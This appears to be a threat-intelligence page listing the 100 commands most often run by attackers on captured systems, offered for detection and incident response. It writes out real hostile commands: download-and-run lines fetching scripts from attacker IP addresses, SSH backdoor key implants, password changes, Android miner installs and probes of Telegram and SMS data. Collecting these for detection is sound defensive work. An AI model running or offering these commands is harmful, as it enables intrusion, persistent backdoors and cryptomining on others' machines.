Updated: February 2026

Top 100 Malicious Commands

Most executed commands by attackers after gaining system access. Useful for intrusion detection and incident response.

4147 commands in 24h

$/bin/./uname -s -v -n -r -m

24 IPs222x

$Enter new UNIX password:

94 IPs198x

$lockr -ia .ssh

150 IPs191x

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

26 IPs165x

$uname -a

133 IPs160x

$cat /proc/cpuinfo | grep model | grep name | wc -l

123 IPs153x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

122 IPs149x

$whoami

118 IPs148x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

119 IPs147x

10.

$cat /proc/cpuinfo | grep name | wc -l

121 IPs146x

11.

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

118 IPs145x

12.

$uname -m

122 IPs144x

13.

$crontab -l

118 IPs143x

14.

$lscpu | grep Model

117 IPs141x

15.

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

119 IPs141x

16.

$uname

112 IPs139x

17.

$w

111 IPs139x

18.

$which ls

112 IPs134x

19.

$top

110 IPs134x

20.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

108 IPs131x

21.

$uname -s -v -n -m 2 > /dev/null

52 IPs131x

22.

$ls -lh $(which ls)

103 IPs123x

23.

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

53 IPs123x

24.

$uname -m 2 > /dev/null

26 IPs87x

25.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

54 IPs62x

26.

$echo hello

8 IPs50x

27.

$uname -s -v -n -r -m

15 IPs41x

28.

$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps

1 IPs14x

29.

$/ip cloud print

9 IPs14x

30.

$curl2

1 IPs14x

31.

$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh

1 IPs14x

32.

cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh

5 IPs13x

33.

$locate D877F783D5D3EF8Cs

10 IPs10x

34.

$ifconfig

8 IPs8x

35.

ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

7 IPs7x

36.

$echo Hi | cat -n

7 IPs7x

37.

$rm -rf /data/local/tmp/*

2 IPs6x

38.

$ps -ef | grep '[Mm]iner'

6 IPs6x

39.

$shell

3 IPs6x

40.

$ps | grep '[Mm]iner'

6 IPs6x

41.

$cat /proc/cpuinfo

6 IPs6x

42.

$system

3 IPs5x

43.

$nproc

2 IPs5x

44.

$if [ [ ! -d ${HOME}/.ssh ] ]

2 IPs5x

45.

$uname -s -m

4 IPs4x

46.

$q

2 IPs4x

47.

$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"

2 IPs4x

48.

$then

2 IPs4x

49.

$Accept-Encoding: gzip

2 IPs4x

50.

$chmod 0755 /data/local/tmp/nohup

2 IPs4x

51.

$pm path com.google.home.tv

2 IPs4x

52.

$tcpdump -D

1 IPs3x

53.

$sh

3 IPs3x

54.

$rm /data/local/tmp/tv.apk

2 IPs3x

55.

$pm path com.ufo.miner

2 IPs3x

56.

$getprop ro.build.version.sdk

1 IPs3x

57.

$enable

3 IPs3x

58.

$/data/local/tmp/nohup su -c /data/local/tmp/log

1 IPs2x

59.

cd /data/local/tmp/; rm -rf *; busybox wget http://103.116.52.126/abc1.sh; sh abc1.sh; wget http://103.116.52.126/abc1.sh; sh abc1.sh; curl http://103.116.52.126/abc1.sh; sh abc1.sh; busybox wget http://103.116.52.126/abc2.sh; sh abc2.sh; wget http://103.116.52.126/abc2.sh; sh abc2.sh; curl http://103.116.52.126/abc2.sh; sh abc2.sh; busybox wget http://103.116.52.126/abc3.sh; sh abc3.sh; wget http://103.116.52.126/abc3.sh; sh abc3.sh; curl http://103.116.52.126/abc3.sh; sh abc3.sh;

2 IPs2x

60.

$am start -n com.ufo.miner/com.example.test.MainActivity

1 IPs2x

61.

$/data/local/tmp/nohup /data/local/tmp/trinity

1 IPs2x

62.

$while read i

2 IPs2x

63.

$am start -n com.google.home.tv/com.example.test.MainActivity

1 IPs2x

64.

$/data/local/tmp/nohup /data/local/tmp/log

1 IPs2x

65.

$rm .s; exit

2 IPs2x

66.

$ps | grep trinity

1 IPs2x

67.

$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s

2 IPs2x

68.

$ps | grep rig

1 IPs2x

69.

$rm -f /data/local/tmp/ufo.apk

1 IPs2x

70.

$ps | grep log

1 IPs2x

71.

$pm install /data/local/tmp/tv.apk

1 IPs2x

72.

$chmod 0755 /data/local/tmp/trinity

1 IPs2x

73.

$pm install /data/local/tmp/ufo.apk

1 IPs2x

74.

$chmod 0755 /data/local/tmp/log

1 IPs2x

75.

$/data/local/tmp/nohup su -c /data/local/tmp/trinity

1 IPs2x

76.

$echo "abcd1234\nGDq9YDyMt7cc\nGDq9YDyMt7cc\n"|passwd

1 IPs1x

77.

$echo "Password1\nqswOLAd4ifCu\nqswOLAd4ifCu\n"|passwd

1 IPs1x

78.

$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox OAXAN

1 IPs1x

79.

$echo "Password1\nnhzVKeW2kznz\nnhzVKeW2kznz\n"|passwd

1 IPs1x

80.

$echo "Passw0rd\nLbkrOeN4GmXF\nLbkrOeN4GmXF\n"|passwd

1 IPs1x

81.

$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox EWGDZ

1 IPs1x

82.

arch_info=$(uname -m);             cpu_count=$(nproc);             echo -e "XK8wyfte\nXK8wyfte" | passwd > /dev/null 2>&1;             if [[ ! -d "${HOME}/.ssh" ]]; then;                 mkdir -p "${HOME}/.ssh" >/dev/null 2>&1;             fi;             touch "${HOME}/.ssh/authorized_keys" 2>/dev/null;             echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk

1 IPs1x

83.

$echo "P@ssw0rd\ncIVX8wnpBUNE\ncIVX8wnpBUNE\n"|passwd

1 IPs1x

84.

$echo "E1ementa!5\nVgmnQPzed1QX\nVgmnQPzed1QX\n"|passwd

1 IPs1x

85.

$echo "888888\nZeT0bu1LiUS2\nZeT0bu1LiUS2\n"|passwd

1 IPs1x

86.

$echo "1q2w3e4r5t6y\nc6W4wklHM4Xk\nc6W4wklHM4Xk\n"|passwd

1 IPs1x

87.

cd /data/local/tmp/; wget http://212.85.24.46:84/cat.sh || curl http://212.85.24.46:84/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android

1 IPs1x

88.

arch_info=$(uname -m);             cpu_count=$(nproc);             echo -e "OAKTuBfB\nOAKTuBfB" | passwd > /dev/null 2>&1;             if [[ ! -d "${HOME}/.ssh" ]]; then;                 mkdir -p "${HOME}/.ssh" >/dev/null 2>&1;             fi;             touch "${HOME}/.ssh/authorized_keys" 2>/dev/null;             echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk

1 IPs1x

89.

$echo "1q2w3e4r5t6y\n6CbLN6iupzh5\n6CbLN6iupzh5\n"|passwd

1 IPs1x

90.

$echo "123\nsN0wot835d8Y\nsN0wot835d8Y\n"|passwd

1 IPs1x

91.

$echo "123\nTAM8sqbINqE2\nTAM8sqbINqE2\n"|passwd

1 IPs1x

92.

$echo "123\nOfuPWA7oGCAw\nOfuPWA7oGCAw\n"|passwd

1 IPs1x

93.

cd /data/local/tmp/; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; busybox curl http://94.156.152.217/kla.sh; sh kla.sh

1 IPs1x

94.

$echo "123\nIon55ygkCupL\nIon55ygkCupL\n"|passwd

1 IPs1x

95.

$echo "ionela\n8gh1L0KSvx8N\n8gh1L0KSvx8N\n"|passwd

1 IPs1x

96.

$echo "1234\ngEMKhmepHGya\ngEMKhmepHGya\n"|passwd

1 IPs1x

97.

$echo "guest\nqHzZW803CeSw\nqHzZW803CeSw\n"|passwd

1 IPs1x

98.

$echo "guest\na8lkKSoPk72U\na8lkKSoPk72U\n"|passwd

1 IPs1x

99.

$echo "gast\nSYXz70enXjZt\nSYXz70enXjZt\n"|passwd

1 IPs1x

100.

$echo "gast\nPUVHYQ0KQP04\nPUVHYQ0KQP04\n"|passwd

1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

These commands can be used to create detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor these patterns in your logs to detect intrusions.